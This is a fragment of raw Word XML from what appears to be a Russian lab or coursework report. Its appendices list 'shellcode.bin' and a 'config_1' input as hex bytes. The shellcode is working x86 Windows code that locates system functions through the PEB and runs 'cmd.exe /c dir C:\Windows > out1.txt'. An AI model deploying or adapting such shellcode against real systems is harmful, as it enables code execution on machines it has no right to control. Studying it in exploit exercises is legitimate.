      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589B3C09" w14:textId="2B600AFA" w:rsidR="00B91720" w:rsidRPr="004D4772" w:rsidRDefault="00B91720" w:rsidP="00B91720">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CB63F" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="004D4772" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4772">
        <w:t>31 c0 04 10 64 8b 48 20 64 8b 40 20 8b 40 0c 8b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C987E75" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="00F91557" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:t>40 14 8b 10 89 d0 8b 10 89 d0 8b 40 10 89 c7 31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713813CF" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="00F91557" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:t>d2 52 31 c9 68 2e 74 78 74 68 6f 75 74 31 68 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5CED14" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="00F91557" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:t>20 3e 20 68 6e 64 6f 77 68 3a 5c 57 69 68 69 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFDBEC" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="00F91557" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:t>20 43 68 2f 63 20 64 68 65 78 65 20 68 63 6d 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4EDC3" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="00F91557" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:t>2e 89 e1 52 52 52 52 52 52 52 52 52 52 52 52 52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06422397" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="00F91557" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:t>52 52 52 6a 44 89 e0 52 52 52 52 89 e3 53 50 52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325C11DA" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="00F91557" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:t>52 52 52 52 52 51 52 89 f8 31 f6 66 be 2a 6a c1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125A24D" w14:textId="77777777" w:rsidR="00F91557" w:rsidRPr="00F91557" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:t>e6 03 01 f0 ff d0 89 c3 89 f8 31 f6 66 be 88 9a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E6A9C9" w14:textId="6BD03019" w:rsidR="008D7D62" w:rsidRPr="00B91720" w:rsidRDefault="00F91557" w:rsidP="00F91557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F91557">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">c1 e6 02 01 f0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F91557">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F91557">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> d0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC53C4D" w14:textId="77777777" w:rsidR="002F1E56" w:rsidRPr="004D4772" w:rsidRDefault="002F1E56" w:rsidP="002F1E56">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2F9E0A" w14:textId="77777777" w:rsidR="002F1E56" w:rsidRDefault="002F1E56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14:paraId="12A7520F" w14:textId="57A1DC82" w:rsidR="002F1E56" w:rsidRPr="00B91720" w:rsidRDefault="002F1E56" w:rsidP="002F1E56">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803B522" w14:textId="30A6589F" w:rsidR="002F1E56" w:rsidRPr="00A122C2" w:rsidRDefault="002F1E56" w:rsidP="002F1E56">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="001840E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A122C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="001840E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>config_1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A122C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64F8B8" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">01 02 00 f4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 08 00 00 c4 09 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A66D02" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 08 c4 09 08 00 00 00 b8 6b a2 00 b8 6b a2 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B0A81C" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>b3 6b a2 00 00 00 00 00 00 00 78 00 00 00 a2 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E37D5" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>2f 73 74 61 72 74 72 79 73 65 6f 62 6b 74 77 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07208AF3" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>69 66 6d 72 71 66 6d 63 61 68 6b 78 65 7a 67 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F31F8" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>66 6d 71 79 77 62 6d 76 74 71 79 61 79 6a 69 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ACB894" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>61 63 6d 79 78 73 6d 6c 68 69 6d 79 6a 6b 65 6b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7531FC86" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6b 64 61 79 68 6d 6c 66 74 65 73 65 6a 73 6a 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B19D10" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">77 74 76 64 72 6e 64 6d 62 6b 6e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>6e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 6f 76 6f 75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE3365E" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6e 7a 63 61 73 68 75 73 70 63 66 70 74 70 68 78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A99FE6" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>77 6b 63 69 66 76 64 6c 7a 76 62 69 61 6f 61 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2667F5AD" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>62 61 76 78 75 64 78 6b 68 69 6e 79 74 78 75 77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D48AD62" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6c 70 7a 6b 75 62 74 77 71 73 6d 62 6d 73 79 67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68308A00" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6a 76 68 76 79 6a 79 69 6d 79 69 77 7a 6b 65 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B1684" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">75 71 74 72 75 74 6e 6a 76 7a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>7a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 67 7a 79 78 6b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750B8ABC" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6b 64 62 61 77 68 67 65 66 6b 68 70 6f 76 61 6a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D644C2" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>73 66 67 78 65 62 61 77 66 78 6c 63 63 71 63 77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7518A70E" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>71 75 67 76 77 71 78 65 68 65 69 78 6d 6f 77 6f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDC975" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>65 75 61 76 63 6f 63 6d 7a 6a 73 61 79 78 6e 61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB673A1" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>73 68 72 75 61 62 6d 6c 78 6e 61 6e 71 61 78 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747ED76E" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>64 6e 78 76 72 62 67 65 6a 78 6a 73 66 74 68 61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B7F09" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>67 76 78 6a 69 67 74 75 6f 77 7a 6c 76 67 6b 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E561A5" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>79 71 62 63 6e 63 6f 72 77 6f 6b 6d 6b 62 6f 67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DFEDEE" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>63 65 65 78 74 70 78 66 78 63 6b 70 62 73 62 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B78806" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6a 74 78 67 76 71 65 64 6e 76 6a 6f 69 63 75 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA095F" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6e 7a 72 6c 6a 78 65 61 66 6a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>6a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 6d 76 76 73 62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45766E63" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6e 67 63 72 71 65 6b 65 70 74 6f 72 79 75 74 6e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B759385" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6d 72 6c 78 76 64 76 62 78 70 75 6e 78 73 6b 6d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A94111" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6f 70 65 63 67 71 61 6a 78 65 6c 71 76 6d 65 61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3031E472" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6c 65 6b 6c 6a 6d 71 65 62 7a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>7a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 76 69 76 65 6a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0515B6E5" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>63 6f 69 76 75 68 7a 79 65 65 6f 74 73 6a 62 6b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D161BA0" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6a 61 6e 76 76 6f 75 7a 65 63 75 67 79 7a 73 71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E97F3" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>73 69 69 74 69 73 6f 7a 68 61 6a 71 71 66 74 65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A88226A" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>75 65 67 6c 64 79 6a 71 74 76 77 73 65 7a 6a 65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639D0DE1" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6c 73 69 6b 76 76 74 64 6d 74 72 74 74 65 77 6d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2A549F" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>68 6c 6e 77 6e 7a 77 78 62 63 78 62 72 68 6a 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD101C" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>7a 6f 61 6d 6c 79 62 65 69 71 6d 78 6d 75 62 69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245FCC6E" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>73 67 73 72 6b 76 66 63 62 65 75 72 67 74 61 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A324BAA" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>63 6a 77 73 76 61 6b 64 6c 62 66 6d 6c 76 65 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D78F9" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>73 69 74 61 74 68 6f 6e 63 71 71 78 6b 67 6d 7a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C66B57C" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7a 69 75 61 71 61 79 61 71 61 66 63 6e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>6e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 6c 74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D2565" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>61 6c 68 7a 76 64 6c 79 70 63 76 72 69 78 72 6b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A07B3D" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">65 70 78 79 68 68 6c 74 7a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>7a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 75 71 6d 6b 73 71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA4D469" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">68 74 6b 77 61 67 79 72 72 78 6c 76 7a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>7a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 6a 6d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A75A6A5" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6f 64 6a 78 66 75 62 6c 70 6d 6f 66 78 67 6c 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E86F45D" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>61 6a 74 79 68 74 6e 70 6f 78 6e 76 62 72 73 68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A596741" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>77 6b 66 6a 69 76 78 71 62 74 6d 72 7a 62 6c 67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB0FCA" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6c 75 6c 73 6e 6d 65 74 62 65 67 73 76 64 6d 70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F996CC" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6a 62 67 67 72 63 70 67 68 6a 7a 79 6d 69 63 65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1ABE7E" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>72 63 71 69 6c 68 63 61 65 72 63 75 65 68 63 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0AABF6" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>6f 78 6b 76 61 69 77 71 77 78 62 72 7a 71 6c 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4773BB15" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>73 6f 73 6d 61 62 62 71 78 75 65 70 74 75 77 7a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDCEFBE" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>77 71 76 79 67 65 62 71 77 79 6c 61 71 6f 77 70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE62111" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>79 78 6c 6d 63 7a 78 70 70 62 6d 69 78 6c 76 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F693D" w14:textId="77777777" w:rsidR="00A122C2" w:rsidRDefault="00A122C2" w:rsidP="00A122C2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">77 74 69 69 76 61 6b </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>6b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 73 73 6a 6c 65 69 61 79</w:t>
      </w:r>
    </w:p>
